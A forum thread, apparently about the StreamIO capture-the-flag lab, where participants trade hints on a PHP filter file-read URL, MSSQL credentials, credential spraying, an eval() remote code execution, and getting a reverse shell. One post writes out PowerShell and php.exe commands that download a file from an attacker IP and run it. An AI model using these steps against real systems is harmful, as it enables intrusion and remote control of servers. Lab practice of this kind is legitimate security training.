Posts: 42 Threads: 0 Joined: N/A (June 5, 2022, 10:15 AM)NoobHTB Wrote: (June 5, 2022, 10:07 AM)qwerty173 Wrote: (June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...
Can we use Winrm or PsExec for these creds? Doesn't look like it no... Tried spraying with cme to no avail... WinRM also isn't open AFAIK Posts: 26 Threads: 0 Joined: N/A Posts: 56 Threads: 0 Joined: N/A (June 5, 2022, 10:07 AM)qwerty173 Wrote: (June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next... I found a MSSQL credential in login.php. Worth taking a look at. Posts: 42 Threads: 0 Joined: N/A (June 5, 2022, 11:29 AM)karhu Wrote: (June 5, 2022, 10:07 AM)qwerty173 Wrote: (June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...
I found a MSSQL credential in login.php. Worth taking a look at. Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol Posts: 23 Threads: 0 Joined: N/A Can anyone explain how did you dump the user table so fast? My sqlmap will take days to dump those 30 users Posts: 46 Threads: 0 Joined: N/A (June 5, 2022, 11:02 AM)jon01 Wrote: (June 5, 2022, 08:03 AM)dude4695 Wrote: anyone got user shell ?
check the master.php code via php filter u will see eval() how to get reverse shell ? Posts: 42 Threads: 0 Joined: N/A Got shell via exec()... just upload and use nc Posts: 56 Threads: 0 Joined: N/A (June 5, 2022, 11:45 AM)qwerty173 Wrote: (June 5, 2022, 11:29 AM)karhu Wrote: (June 5, 2022, 10:07 AM)qwerty173 Wrote: (June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...
I found a MSSQL credential in login.php. Worth taking a look at.
Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol Same lol I tried mshta, which connected to my system, but then the webserver crashed. Finally got the reverse shell by using powershell: cmd=powershell.exe+iwr+-uri+<IP>/<filename>.php+-outfile+"C:\Downloads\<filename>.php" Then, cmd=php.exe+..\..\..\Downloads\<filename>.php Posts: 73 Threads: 0 Joined: N/A Posts: 46 Threads: 0 Joined: N/A can anyone give me steps to get rev shell ? |
